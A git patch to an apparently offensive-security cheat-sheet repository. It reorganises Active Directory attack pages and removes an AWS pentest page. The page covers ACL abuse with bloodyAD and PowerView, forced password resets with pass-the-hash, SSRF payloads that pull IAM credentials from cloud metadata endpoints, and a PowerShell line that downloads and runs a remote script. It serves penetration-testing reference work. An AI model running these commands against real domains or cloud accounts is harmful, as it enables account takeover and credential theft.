From e85b723f5e6c2d15fa3a3ac5518bec891e96ec17 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 31 Dec 2023 18:55:37 +0100
Subject: [PATCH] AWS - Pages v0.1
---
 .../ad-adcs-certificate-services.md | 13 +-
 docs/active-directory/ad-adds-acl-ace.md | 42 +-
 docs/active-directory/ad-adds-enumerate.md | 5 +-
 docs/active-directory/ad-adds-rodc.md | 4 +
 .../ad-adfs-federation-services.md | 2 +-
 docs/cloud/aws/AWS Pentest.md | 632 +-----------------
 docs/cloud/aws/aws-access-token.md | 85 +++
 docs/cloud/aws/aws-cognito.md | 17 +
 docs/cloud/aws/aws-dynamodb.md | 36 +
 docs/cloud/aws/aws-ec2.md | 89 +++
 docs/cloud/aws/aws-enumeration.md | 117 ++++
 docs/cloud/aws/aws-ioc-detection.md | 38 ++
 docs/cloud/aws/aws-lambda.md | 15 +
 docs/cloud/aws/aws-metadata.md | 103 +++
 docs/cloud/aws/aws-s3-bucket.md | 41 ++
 docs/cloud/aws/aws-ssm.md | 29 +
 docs/cloud/aws/aws-training.md | 8 +
 docs/cloud/azure/azure-ad-connect.md | 3 +-
 18 files changed, 619 insertions(+), 660 deletions(-)
 create mode 100644 docs/cloud/aws/aws-access-token.md
 create mode 100644 docs/cloud/aws/aws-cognito.md
 create mode 100644 docs/cloud/aws/aws-dynamodb.md
 create mode 100644 docs/cloud/aws/aws-ec2.md
 create mode 100644 docs/cloud/aws/aws-enumeration.md
 create mode 100644 docs/cloud/aws/aws-ioc-detection.md
 create mode 100644 docs/cloud/aws/aws-lambda.md
 create mode 100644 docs/cloud/aws/aws-metadata.md
 create mode 100644 docs/cloud/aws/aws-s3-bucket.md
 create mode 100644 docs/cloud/aws/aws-ssm.md
 create mode 100644 docs/cloud/aws/aws-training.md
diff --git a/docs/active-directory/ad-adcs-certificate-services.md b/docs/active-directory/ad-adcs-certificate-services.md
index d8c65b3..9e40caa 100644
--- a/docs/active-directory/ad-adcs-certificate-services.md
+++ b/docs/active-directory/ad-adcs-certificate-services.md
@@ -1,9 +1,14 @@ # Active Directory - Certificate Services -* Find ADCS Server - * `crackmapexec ldap domain.lab -u username -p password -M adcs` - * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=,OU=Users,DC=domain,DC=local' -w '' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` -* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump` +Active Directory Certificate Services (AD CS) is a Microsoft Windows server role that provides a public key infrastructure (PKI). It allows you to create, manage, and distribute digital certificates, which are used to secure communication and transactions across a network. + + +## ADCS Enumeration + +* crackmapexec: `crackmapexec ldap domain.lab -u username -p password -M adcs` +* ldapsearch: `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=,OU=Users,DC=domain,DC=local' -w '' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` +* certutil: `certutil.exe -config - -ping`, `certutil -dump` + ## ESC1 - Misconfigured Certificate Templates
diff --git a/docs/active-directory/ad-adds-acl-ace.md b/docs/active-directory/ad-adds-acl-ace.md
index 072c444..220ff3e 100644
--- a/docs/active-directory/ad-adds-acl-ace.md
+++ b/docs/active-directory/ad-adds-acl-ace.md
@@ -133,12 +133,9 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi * WriteDACL on Group ```powershell - Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1 + PowerSploit> Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1 net group "INTERESTING_GROUP" User1 /add /domain - ``` - Or - ```powershell - bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp + bloodyAD> bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp # Remove right bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False
@@ -151,7 +148,9 @@ An attacker can update the owner of the target object. Once the object owner has ```powershell Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal' ``` -Or + +Using BloodyAD + ```powershell bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object ```
@@ -166,7 +165,9 @@ An attacker can read the LAPS password of the computer account this ACE applies ```powershell Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' ``` + Or for a given computer + ```powershell bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime ```
@@ -184,7 +185,9 @@ $mp = $gmsa.'msDS-ManagedPassword' # Decode the data structure using the DSInternals module ConvertFrom-ADManagedPasswordBlob $mp ``` -Or + +Using BloodyAD + ```powershell python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword ```
@@ -192,20 +195,21 @@ python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getO ## ForceChangePassword An attacker can change the password of the user this ACE applies to: -* On Windows, this can be achieved with `Set-DomainUserPassword` (PowerView module): -```powershell -$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force -Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword -``` -* On Linux: -```bash -# Using rpcclient from the Samba software suite -rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" +* Windows: + ```powershell + $NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force + Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword + ``` -# Using bloodyAD with pass-the-hash -bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd -``` +* Linux: + ```bash + # Using rpcclient from the Samba software suite + rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" + + # Using bloodyAD with pass-the-hash + bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd + ``` ## References
diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md
index 12a1fd1..a68c2ba 100644
--- a/docs/active-directory/ad-adds-enumerate.md
+++ b/docs/active-directory/ad-adds-enumerate.md
@@ -216,11 +216,7 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun #Confirming admin access: Invoke-UserHunter -CheckAccess ``` - :heavy_exclamation_mark: **Priv Esc to Domain Admin with User Hunting:** \ - I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> - Profit! - [PowerView 3.0 Tricks](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) ## Using AD Module
@@ -319,3 +315,4 @@ You can remotely query every machines on the network to get a list of the users' * [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/) * [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/) * [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) +* [PowerView 3.0 Tricks - HarmJ0y](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993)
\ No newline at end of file
diff --git a/docs/active-directory/ad-adds-rodc.md b/docs/active-directory/ad-adds-rodc.md
index 34c86a2..d437b9c 100644
--- a/docs/active-directory/ad-adds-rodc.md
+++ b/docs/active-directory/ad-adds-rodc.md
@@ -13,10 +13,14 @@ RODCs are an alternative for Domain Controllers in less secure physical location ## RODC Key List Attack **Requirements**: + * [Impacket PR #1210 - The Kerberos Key List Attack](https://github.com/SecureAuthCorp/impacket/pull/1210) * **krbtgt** credentials of the RODC (-rodcKey) * **ID of the krbtgt** account of the RODC (-rodcNo) + +**Exploit**: + * using Impacket ```ps1 # keylistattack.py using SAMR user enumeration without filtering (-full flag)
diff --git a/docs/active-directory/ad-adfs-federation-services.md b/docs/active-directory/ad-adfs-federation-services.md
index a07be95..2666a3a 100644
--- a/docs/active-directory/ad-adfs-federation-services.md
+++ b/docs/active-directory/ad-adfs-federation-services.md
@@ -38,7 +38,7 @@ Other interesting tools to exploit AD FS: -* [WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) +* [secureworks/whiskeysamlandfriends/WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) - Proof of concept for a Golden SAML attack with Remote ADFS Configuration Extraction. ## References
diff --git a/docs/cloud/aws/AWS Pentest.md b/docs/cloud/aws/AWS Pentest.md
index be68132..88b6d39 100644
--- a/docs/cloud/aws/AWS Pentest.md
+++ b/docs/cloud/aws/AWS Pentest.md
@@ -1,389 +1,5 @@ # Cloud - AWS -> Amazon Web Services offers reliable, scalable, and inexpensive cloud computing services. - -## Summary - -- [AWS](#aws) - - [Summary](#summary) - - [Training](#training) - - [Tools](#tools) - - [AWS - Patterns](#aws---patterns) - - [URL Services](#url-services) - - [Access Key ID & Secret](#access-key-id--secret) - - [AWS - Metadata SSRF](#aws---metadata-ssrf) - - [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2) - - [Method for Container Service (Fargate)](#method-for-container-service-fargate) - - [AWS API calls that return credentials](#aws-api-calls-that-return-credentials) - - [AWS - Shadow Admin](#aws---shadow-admin) - - [Admin equivalent permission](#admin-equivalent-permission) - - [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys) - - [AWS - Enumerate IAM permissions](#aws---enumerate-iam-permissions) - - [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux) - - [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image) - - [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance) - - [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code) - - [AWS - SSM - Command execution](#aws---ssm---command-execution) - - [AWS - Golden SAML Attack](#aws---golden-saml-attack) - - [AWS - Shadow Copy attack](#aws---shadow-copy-attack) - - [Disable CloudTrail](#disable-cloudtrail) - - [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty) - - [DynamoDB](#dynamodb) - - [Security checks](#security-checks) - - [AWSome Pentesting Cheatsheet](#awsome-pentesting-cheatsheet) - - [References](#references) - -## Training - -* CloudFoxable: A Gamified Cloud Hacking Sandbox - https://cloudfoxable.bishopfox.com/ -* AWSGoat : A Damn Vulnerable AWS Infrastructure - https://github.com/ine-labs/AWSGoat 
-* Damn Vulnerable Cloud Application - https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 -* SadCloud - https://github.com/nccgroup/sadcloud -* Flaws - http://flaws.cloud -* Cloudgoat - https://github.com/RhinoSecurityLabs/cloudgoat - -## Tools - -* [CloudFox](https://github.com/BishopFox/CloudFox/) - Automating situational awareness for cloud penetration tests. Designed for white box enumeration (SecurityAudit/ReadOnly type permission), but can be used for black box (found credentials) as well. - * Either Download the [latest binary release](https://github.com/BishopFox/cloudfox/releases) for your platform, or build it from source. - ``` - git clone https://github.com/BishopFox/cloudfox.git - cd ./cloudfox - go build . - ``` - - * Run all AWS checks: `cloudfox aws --profile [profile-name] all-checks` - * List all AWS checks: `cloudfox aws` - -* [SkyArk](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins - * Requires read-Only permissions over IAM service - ```powershell - $ git clone https://github.com/cyberark/SkyArk - $ powershell -ExecutionPolicy Bypass -NoProfile - PS C> Import-Module .\SkyArk.ps1 -force - PS C> Start-AWStealth - - or in the Cloud Console - - PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AWStealth/AWStealth.ps1') - PS C> Scan-AWShadowAdmins - ``` - -* [Pacu](https://github.com/RhinoSecurityLabs/pacu) - Exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set - * Requires AWS Keys - ```powershell - $ git clone https://github.com/RhinoSecurityLabs/pacu - $ bash install.sh - $ python3 pacu.py - set_keys/swap_keys - ls - run [--keyword-arguments] - run --regions eu-west-1,us-west-1 - - # https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details - ``` - -* 
[Bucket Finder](https://digi.ninja/projects/bucket_finder.php) - Search for public buckets, list and download all files if directory indexing is enabled - ```powershell - wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 - ./bucket_finder.rb my_words - ./bucket_finder.rb --region ie my_words - US Standard = http://s3.amazonaws.com - Ireland = http://s3-eu-west-1.amazonaws.com - Northern California = http://s3-us-west-1.amazonaws.com - Singapore = http://s3-ap-southeast-1.amazonaws.com - Tokyo = http://s3-ap-northeast-1.amazonaws.com - - ./bucket_finder.rb --download --region ie my_words - ./bucket_finder.rb --log-file bucket.out my_words - ``` - -* [Boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) - Amazon Web Services (AWS) SDK for Python - ```python - import boto3 - # Create an S3 client - s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1') - - try: - result = s3.list_buckets() - print(result) - except Exception as e: - print(e) - ``` - -* [Prowler](https://github.com/toniblyx/prowler) - AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness - - > It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100). 
- * Require: arn:aws:iam::aws:policy/SecurityAudit - - ```powershell - $ pip install awscli ansi2html detect-secrets - $ git clone https://github.com/toniblyx/prowler - $ sudo apt install jq - $ ./prowler -E check42,check43 - $ ./prowler -p custom-profile -r us-east-1 -c check11 - $ ./prowler -A 123456789012 -R ProwlerRole # sts assume-role - ``` - -* [Principal Mapper](https://github.com/nccgroup/PMapper) - A tool for quickly evaluating IAM permissions in AWS - ```powershell - https://github.com/nccgroup/PMapper - pip install principalmapper - pmapper graph --create - pmapper visualize --filetype png - pmapper analysis --output-type text - - # Determine if PowerUser can escalate privileges - pmapper query "preset privesc user/PowerUser" - pmapper argquery --principal user/PowerUser --preset privesc - - # Find all principals that can escalate privileges - pmapper query "preset privesc *" - pmapper argquery --principal '*' --preset privesc - - # Find all principals that PowerUser can access - pmapper query "preset connected user/PowerUser *" - pmapper argquery --principal user/PowerUser --resource '*' --preset connected - - # Find all principals that can access PowerUser - pmapper query "preset connected * user/PowerUser" - pmapper argquery --principal '*' --resource user/PowerUser --preset connected - ``` - -* [ScoutSuite](https://github.com/nccgroup/ScoutSuite/wiki) - Multi-Cloud Security Auditing Tool - ```powershell - $ git clone https://github.com/nccgroup/ScoutSuite - $ python scout.py PROVIDER --help - # The --session-token is optional and only used for temporary credentials (i.e. role assumption). 
- $ python scout.py aws --access-keys --access-key-id --secret-access-key --session-token - $ python scout.py azure --cli - ``` - -* [s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files - ```powershell - $ git clone https://github.com/nccgroup/s3_objects_check - $ python3 -m venv env && source env/bin/activate - $ pip install -r requirements.txt - $ python s3-objects-check.py -h - $ python s3-objects-check.py -p whitebox-profile -e blackbox-profile - ``` - -* [cloudsplaining](https://github.com/salesforce/cloudsplaining) - An AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized report - ```powershell - $ pip3 install --user cloudsplaining - $ cloudsplaining download --profile myawsprofile - $ cloudsplaining scan --input-file default.json - ``` - -* [weirdAAL](https://github.com/carnal0wnage/weirdAAL/wiki) - AWS Attack Library - ```powershell - python3 weirdAAL.py -m ec2_describe_instances -t demo - python3 weirdAAL.py -m lambda_get_account_settings -t demo - python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2' -t yolo - ``` - -* [cloudmapper](https://github.com/duo-labs/cloudmapper.git) - CloudMapper helps you analyze your Amazon Web Services (AWS) environments - ```powershell - git clone https://github.com/duo-labs/cloudmapper.git - # sudo yum install autoconf automake libtool python3-devel.x86_64 python3-tkinter python-pip jq awscli - # You may additionally need "build-essential" - sudo apt-get install autoconf automake libtool python3.7-dev python3-tk jq awscli - pipenv install --skip-lock - pipenv shell - report: Generate HTML report. Includes summary of the accounts and audit findings. - iam_report: Generate HTML report for the IAM information of an account. - audit: Check for potential misconfigurations. - collect: Collect metadata about an account. 
- find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges - ``` - -* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) - A CLI tool for executing attacks on cognito such as *Unwanted account creation*, *Account Oracle* and *Identity Pool escalation*. - ```bash - # Installation - $ pip install cognito-scanner - # Usage - $ cognito-scanner --help - # Get information about how to use the unwanted account creation script - $ cogntio-scanner account-creation --help - # For more details go to https://github.com/padok-team/cognito-scanner - ``` - -* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode -* [NetSPI/AWS Consoler](https://github.com/NetSPI/aws_consoler) - Convert AWS Credentials into a console access - - - -## AWS - Patterns - -### URL Services - -| Service | URL | -|--------------|-----------------------| -| s3 | https://{user_provided}.s3.amazonaws.com | -| cloudfront | https://{random_id}.cloudfront.net | -| ec2 | ec2-{ip-seperated}.compute-1.amazonaws.com | -| es | https://{user_provided}-{random_id}.{region}.es.amazonaws.com | -| elb | http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 | -| elbv2 | https://{user_provided}-{random_id}.{region}.elb.amazonaws.com | -| rds | mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 | -| rds | postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 | -| route 53 | {user_provided} | -| execute-api | https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} | -| cloudsearch | https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com | -| transfer | sftp://s-{random_id}.server.transfer.{region}.amazonaws.com | -| iot | mqtt://{random_id}.iot.{region}.amazonaws.com:8883 | -| iot | https://{random_id}.iot.{region}.amazonaws.com:8443 | -| iot | https://{random_id}.iot.{region}.amazonaws.com:443 | -| mq | 
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162 | -| mq | ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 | -| kafka | b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com | -| kafka | {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com | -| cloud9 | https://{random_id}.vfs.cloud9.{region}.amazonaws.com | -| mediastore | https://{random_id}.data.mediastore.{region}.amazonaws.com | -| kinesisvideo | https://{random_id}.kinesisvideo.{region}.amazonaws.com | -| mediaconvert | https://{random_id}.mediaconvert.{region}.amazonaws.com | -| mediapackage | https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel | - - -### Access Key ID & Secret - -IAM uses the following prefixes to indicate what type of resource each unique ID applies to. The first four characters are the prefix that depends on the type of the key. - -| Prefix | Resource type | -|--------------|-------------------------| -| ABIA | AWS STS service bearer token | -| ACCA | Context-specific credential | -| AGPA | User group | -| AIDA | IAM user | -| AIPA | Amazon EC2 instance profile | -| AKIA | Access key | -| ANPA | Managed policy | -| ANVA | Version in a managed policy | -| APKA | Public key | -| AROA | Role | -| ASCA | Certificate | -| ASIA | Temporary (AWS STS) access key | - -The rest of the string is Base32 encoded and can be used to recover the account id. 
- -```py -import base64 -import binascii - -def AWSAccount_from_AWSKeyID(AWSKeyID): - - trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix - x = base64.b32decode(trimmed_AWSKeyID) #base32 decode - y = x[0:6] - - z = int.from_bytes(y, byteorder='big', signed=False) - mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) - - e = (z & mask)>>7 - return (e) - - -print ("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML"))) -``` - - -## AWS - Metadata SSRF - -> AWS released additional security defences against the attack. - -:warning: Only working with IMDSv1. -Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id --profile --http-endpoint enabled --http-token required`. - -In order to use IMDSv2 you must provide a token. - -```powershell -export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` -curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data" -``` - -### Method for Elastic Cloud Compute (EC2) - -Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ - -1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/ - ```powershell - ami-id - ami-launch-index - ami-manifest-path - block-device-mapping/ - events/ - hostname - iam/ - identity-credentials/ - instance-action - instance-id - ``` -2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/ -3. 
Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ - ```powershell - { - "Code" : "Success", - "LastUpdated" : "2019-07-31T23:08:10Z", - "Type" : "AWS-HMAC", - "AccessKeyId" : "ASIA54BL6PJR37YOEP67", - "SecretAccessKey" : "OiAjgcjm1oi2xxxxxxxxOEXkhOMhCOtJMP2", - "Token" : "AgoJb3JpZ2luX2VjEDU86Rcfd/34E4rtgk8iKuTqwrRfOppiMnv", - "Expiration" : "2019-08-01T05:20:30Z" - } - ``` - -### Method for Container Service (Fargate) - -1. Fetch the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable from https://awesomeapp.com/download?file=/proc/self/environ - ```powershell - JAVA_ALPINE_VERSION=8.212.04-r0 - HOSTNAME=bbb3c57a0ed3SHLVL=1PORT=8443HOME=/root - AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 - AWS_EXECUTION_ENV=AWS_ECS_FARGATEMVN_VER=3.3.9JAVA_VERSION=8u212AWS_DEFAULT_REGION=us-west-2 - ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb4f6285-48f2-4a51-a787-67dbe61c13ffPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin:/usr/lib/mvn:/usr/lib/mvn/binLANG=C.UTF-8AWS_REGION=us-west-2Tag=48111bbJAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jreM2=/usr/lib/mvn/binPWD=/appM2_HOME=/usr/lib/mvnLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjd - ``` -2. 
Use the credential URL to dump the AccessKey and SecretKey : https://awesomeapp.com/forward?target=http://169.254.170.2/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 - ```powershell - { - "RoleArn": "arn:aws:iam::953574914659:role/awesome-waf-role", - "AccessKeyId": "ASIA54BL6PJR2L75XHVS", - "SecretAccessKey": "j72eTy+WHgIbO6zpe2DnfjEhbObuTBKcemfrIygt", - "Token": "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", - "Expiration": "2019-09-18T04:05:59Z" - } - ``` - - -### AWS API calls that return credentials - -- chime:createapikey -- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html) -- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html) -- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html) -- [cognito-identity:getcredentialsforidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html) -- [connect:getfederationtoken](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html) -- [connect:getfederationtokens](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html) -- [ecr:getauthorizationtoken](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_GetAuthorizationToken.html) -- [gamelift:requestuploadcredentials](https://docs.aws.amazon.com/gamelift/latest/apireference/API_RequestUploadCredentials.html) -- [iam:createaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html) -- [iam:createloginprofile](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html) -- [iam:createservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateServiceSpecificCredential.html) -- 
[iam:resetservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_ResetServiceSpecificCredential.html) -- [iam:updateaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateAccessKey.html) -- [lightsail:getinstanceaccessdetails](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetInstanceAccessDetails.html) -- [lightsail:getrelationaldatabasemasteruserpassword](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetRelationalDatabaseMasterUserPassword.html) -- [rds-db:connect](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) -- [redshift:getclustercredentials](https://docs.aws.amazon.com/redshift/latest/APIReference/API_GetClusterCredentials.html) -- [sso:getrolecredentials](https://docs.aws.amazon.com/singlesignon/latest/PortalAPIReference/API_GetRoleCredentials.html) -- [mediapackage:rotatechannelcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-credentials.html) -- [mediapackage:rotateingestendpointcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-ingest_endpoints-ingest_endpoint_id-credentials.html) -- [sts:assumerole](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html) -- [sts:assumerolewithsaml](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-saml.html) -- [sts:assumerolewithwebidentity](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html) -- [sts:getfederationtoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-federation-token.html) -- [sts:getsessiontoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-session-token.html) - - ## AWS - Shadow Admin ### Admin equivalent permission 
@@ -504,114 +120,6 @@ $> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED] https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED ``` -## AWS - Enumerate IAM permissions - -Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam) - -```powershell -git clone git@github.com:andresriancho/enumerate-iam.git -pip install -r requirements.txt -./enumerate-iam.py --access-key AKIA... --secret-key StF0q... -2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..." -2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked! -2019-05-10 15:58:01,537 - 21345 - [INFO] -- { - "RoleDetailList": [ - { - "Tags": [], - "AssumeRolePolicyDocument": { - "Version": "2008-10-17", - "Statement": [ - { -... -2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked! -2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked! -2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked! -2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked! -2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked! -``` - -## AWS - Mount EBS volume to EC2 Linux - -:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. - -1. Head over to EC2 –> Volumes and create a new volume of your preferred size and type. -2. Select the created volume, right click and select the "attach volume" option. -3. 
